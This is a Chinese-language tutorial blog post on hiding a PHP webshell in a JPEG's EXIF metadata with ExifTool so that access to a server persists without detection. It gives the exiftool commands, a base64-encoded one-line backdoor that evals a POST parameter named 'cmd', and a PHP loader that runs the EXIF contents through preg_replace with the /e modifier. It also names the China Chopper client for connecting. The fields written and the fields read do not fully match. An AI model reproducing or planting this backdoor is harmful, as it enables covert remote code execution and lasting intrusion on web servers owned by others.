利用EXIFTool 隐藏WebShell

[TOC]

##意义
常见WebShell比较容易识别,利用图片exif信息可以达到隐藏WebShell的目的,以便持久化。(当然,这不是持久化的最好方法,不过作为临时持久化方法还是可以试试的)

##工具

  1. ExifTool
  2. 一句话木马
  3. 中国菜刀客户端
  4. 图片

##步骤

  1. 跟度娘要一张喜欢的图片
    略了

  2. 安装ExifTool
    2.1 环境Kali
    2.2 命令:apt-get install exiftool

  3. 向图片中写入一句话木马
    执行命令:
    exiftool "-comment=<test.php timg.jpg"
    exiftool "-model=/.*/e" timg.jpg
    字符串:
    aWYgKGlzc2V0KCRfUE9TVFsiY21kIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjbWQiXSkpO30=
    Base64解码之后的东西,我就补贴出来了,总之密码是cmd
    执行结果如下:
    微信截图_20170918185956.png
    可以看到我们的一句话木马就写到了图片信息当中

  4. 修改版一句话木马

    1
    2
    3
    4
    <?php 
    $exif = exif_read_data('/www/web/phpshell_google_com/public_html/timg.jpg');
    preg_replace($exif[Model],$exif[Make],'');
    ?>
  5. GetShell
    微信截图_20170918191022.png

注意事项

[1] 图片路径可以是绝对路径,也可以是相对路径,如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示,preg_replace函数的/e选项在>5.6版本中废除,不过也有别的函数替代。思路是对的,注意函数使用。
[3] 不要长时间盯着苍老师的图片看,图有魔性~~

##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html